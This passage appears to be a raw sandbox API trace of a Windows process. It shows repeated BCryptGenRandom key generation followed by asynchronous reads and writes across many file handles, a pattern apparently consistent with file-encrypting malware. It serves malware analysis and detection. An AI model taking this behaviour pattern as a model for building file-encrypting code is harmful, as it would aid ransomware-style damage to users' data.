_Size=0x4) returned 0x1fa91d0 [0141.990] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.990] free (_Block=0x1fa91d0) [0141.990] free (_Block=0x77d7a8) [0141.990] free (_Block=0x1fa90b8) [0141.990] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0141.990] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0141.999] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.999] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0141.999] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.000] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0142.000] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.000] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.000] free (_Block=0x3e305b8) [0142.000] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.000] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.000] free (_Block=0x1fa91d0) [0142.000] free (_Block=0x77d7a8) [0142.000] free (_Block=0x1fa90b8) [0142.000] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0142.001] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.010] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.011] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0142.011] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.011] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0142.011] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.011] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.011] free (_Block=0x3e305b8) [0142.012] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.012] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.012] free (_Block=0x1fa91d0) [0142.012] free (_Block=0x77d7a8) [0142.012] free (_Block=0x1fa90b8) [0142.012] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0142.012] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.021] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.022] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0142.022] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.022] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0142.022] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.022] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.022] free (_Block=0x3e305b8) [0142.022] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.022] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.023] free (_Block=0x1fa91d0) [0142.023] free (_Block=0x77d7a8) [0142.023] free (_Block=0x1fa90b8) [0142.023] WriteFile (in: hFile=0x3cc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0142.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.034] CloseHandle (hObject=0xec) returned 1 [0142.034] free (_Block=0x3d70450) [0142.034] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.040] CloseHandle (hObject=0x170) returned 1 [0142.040] free (_Block=0x3e70008) [0142.040] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.043] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2c8c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.044] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.073] CloseHandle (hObject=0x308) returned 1 [0142.073] free (_Block=0x3df0008) [0142.073] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.081] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.081] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0142.081] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.081] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.081] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0142.082] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.082] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.082] free (_Block=0x3e305b8) [0142.082] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.082] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.082] free (_Block=0x1fa91d0) [0142.082] free (_Block=0x77d7a8) [0142.082] free (_Block=0x1fa90b8) [0142.082] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0142.082] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.090] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.091] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0142.091] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.092] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.092] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0142.092] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.092] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.092] free (_Block=0x3e305b8) [0142.092] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.092] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.092] free (_Block=0x1fa91d0) [0142.092] free (_Block=0x77d7a8) [0142.092] free (_Block=0x1fa90b8) [0142.092] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.093] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.103] CloseHandle (hObject=0x338) returned 1 [0142.103] free (_Block=0x1ff1e60) [0142.103] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.111] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x6890, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0142.117] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.147] CloseHandle (hObject=0x170) returned 1 [0142.147] free (_Block=0x3e70008) [0142.148] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.152] CloseHandle (hObject=0xec) returned 1 [0142.152] free (_Block=0x3ef0008) [0142.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.161] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0142.161] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.169] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.169] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.173] CloseHandle (hObject=0x338) returned 1 [0142.177] free (_Block=0x3d70450) [0142.177] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.815] CloseHandle (hObject=0xec) returned 1 [0142.815] free (_Block=0x1ff1e60) [0142.815] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0142.871] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.872] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0142.872] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.872] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.872] free (_Block=0x3e305b8) [0142.872] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.872] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.873] free (_Block=0x1fa91d0) [0142.873] free (_Block=0x77d7a8) [0142.873] free (_Block=0x1fa90b8) [0142.873] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0142.873] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.878] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2020, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0142.879] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.890] CloseHandle (hObject=0x338) returned 1 [0142.890] free (_Block=0x3d70450) [0142.890] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.897] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4146, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.910] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.920] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0142.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.921] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0142.921] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.921] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.921] free (_Block=0x3e305b8) [0142.921] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.921] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.922] free (_Block=0x1fa91d0) [0142.922] free (_Block=0x77d7a8) [0142.922] free (_Block=0x1fa90b8) [0142.922] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0142.922] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.937] CloseHandle (hObject=0x338) returned 1 [0142.937] free (_Block=0x3df0008) [0142.937] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.949] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xf0c1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0142.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.954] CloseHandle (hObject=0x308) returned 1 [0142.955] free (_Block=0x3e70008) [0142.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0142.955] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc060, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0143.657] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5285, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0143.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0143.674] CloseHandle (hObject=0x338) returned 1 [0143.674] free (_Block=0x3df0008) [0143.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0143.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.770] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0143.770] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.770] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0143.771] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0143.771] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0143.771] free (_Block=0x3e305b8) [0143.771] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0143.771] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0143.771] free (_Block=0x1fa91d0) [0143.771] free (_Block=0x77d7a8) [0143.771] free (_Block=0x1fa90b8) [0143.771] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0143.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0143.777] CloseHandle (hObject=0xec) returned 1 [0143.777] free (_Block=0x1ff1e60) [0143.778] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0143.799] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x8fe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0143.799] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0143.809] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.809] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0143.809] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.809] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0143.810] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0143.810] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0143.810] free (_Block=0x3e305b8) [0143.810] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0143.810] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0143.810] free (_Block=0x1fa91d0) [0143.810] free (_Block=0x77d7a8) [0143.810] free (_Block=0x1fa90b8) [0143.810] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0143.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0143.820] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8fc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0143.820] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0143.832] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x84a6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, 